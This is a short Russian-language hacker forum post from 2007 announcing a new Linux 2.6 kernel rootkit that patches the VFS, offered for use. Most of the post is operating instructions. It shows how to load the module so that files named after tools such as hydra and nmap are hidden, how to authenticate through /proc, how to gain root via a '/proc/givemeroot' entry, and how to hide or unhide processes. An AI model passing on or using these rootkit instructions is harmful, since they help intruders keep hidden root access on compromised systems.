19.03.2007, 20:12
|
|
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723
Репутация:
1477
|
|
Мембер XND Crew Windex выпустил новую версию руткита, основанного на патчинге VFS под ядра 2.6.x. Функционал самый стандартный: прячет самого себя, файлы, каталоги, процессы.
Использование:
Код:
#insmod wkmr26.ko hidden_files="hacktoolz","hydra","nmap"
все файлы и каталоги, содержащие в названии "hacktoolz","hydra","nmap" будут скрыты.
Затем следует авторизоваться:
$echo > /proc/<KEY>
Спрятать процессы можно следующим образом:
$echo > /proc/givemeroot стать суперпользователем
$echo > /proc/hide-<PID> скрыть процесс
$echo > /proc/unhide-<PID> раскрыть прцесс
Как признаётся сам автор, большинство идей было позаимствованно из руткита adore-ng.
Кстати, хорошая статья от самого автора об рутките была в езине HackConnect #1. Рекомендую всем ознакомиться.
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
Последний раз редактировалось ShadOS; 19.03.2007 в 21:17..
Причина: орфография хромает
|
|
|